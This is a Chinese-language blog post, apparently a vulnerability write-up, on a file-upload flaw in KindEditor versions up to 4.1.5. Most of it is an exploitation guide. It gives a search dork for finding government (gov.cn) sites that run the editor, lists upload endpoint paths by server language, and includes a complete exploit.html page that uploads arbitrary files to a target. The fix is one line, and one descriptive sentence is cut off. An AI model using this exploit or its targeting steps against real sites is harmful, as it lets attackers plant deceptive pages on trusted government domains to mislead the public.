kindeditor漏洞
漏洞等级:高危
Kindeditor是一套开源的HTML可视化编辑器,主要用于让用户在网站上获得所见即所得编辑效果,兼容IE、Firefox、Chrome、Safari、Opera等主流浏览器。
漏洞描述:
Kindeditor能够上传doc,docx,xls,xlsx,ppt,htm,html,txt,zip,rar,gz,bz2,wps,pdf格式文件。支持
漏洞利用:
- 通过搜索引擎找到目标,比如:搜索关键字 inurl:gov.cn/kindeditor
- 通过访问http://www.xx.gov.cn/kindeditor/kindeditor.js,查看kindeditor版本是否含有漏洞(<=4.1.5)
- 获得网站使用的开发语言,并确定kindeditor上传文件地址,各种语言上传地址如下:
/asp/upload_json.asp
/asp.net/upload_json.ashx
/jsp/upload_json.jsp
/php/upload_json.php
- 创建exploit.html页面,编辑内容如下:
<html>
<head>
<title>kindeditor exploit</title>
<script src="http://www.xx.gov.cn/kindeditor/kindeditor.js"></script>
<script>
KindEditor.ready(function(K) {
var uploadbutton = K.uploadbutton({
button : K('#uploadButton')[0],
fieldName : 'imgFile',
url : 'http://www.xx.gov.cn/kindeditor/asp.net/upload_json.ashx?dir=file',
afterUpload : function(data) {
if (data.ERROR === 0) {
var url = K.formatUrl(data.url, 'absolute');
K('#url').val(url);}
},
});
uploadbutton.fileBox.change(function(e) {
uploadbutton.submit();
});
});
</script>
</head>
<body>
<p class="upload">
<input type="button" id="uploadButton" value="Upload" />
</p>
</body>
</html>
访问页面效果如下:
- 选择文件test.txt文件(文件内容:test…2019/03/04),网站审核元素,查看返回结果,如图:
- 访问网址结果如下:
漏洞影响:
由于该漏洞无法上传php,asp,java等类型文件,所以无法getshell,但是可以上传包含色情、赌博等类欺骗性html网页,如果上传到政府类网站,不法分子会利用政府域名的权威性达到欺骗普通用户的目的,所以危害性很大。
解决办法:
限制上传文件类型
相关阅读
一、背景昨天(2018-07-04)微信支付的SDK曝出重大漏洞(XXE漏洞),通过该漏洞,攻击者可以获取服务器中目录结构、文件内容,如代码、各种私钥
入行云安全有快两年了,从最开始的不懂安全一脸懵懂,到现在略微能对行业“指点”一二,感触良多。本文重点讲一讲在线漏洞扫描服务以及
XSS简介 XSS是跨站脚本攻击(Cross Site Scripting)的简写,为了不与层叠样式表混淆而改写的。此漏洞也是网站存在相当多的漏洞,仅次
开发四年只会写业务代码,分布式高并发都不会还做程
MS17-010漏洞利用工具系统入侵(实测) 一、打开kali和win7查看IP。(1) Windows7作为靶机(2) Kali作为攻击机(最新版kaili)二、打开ka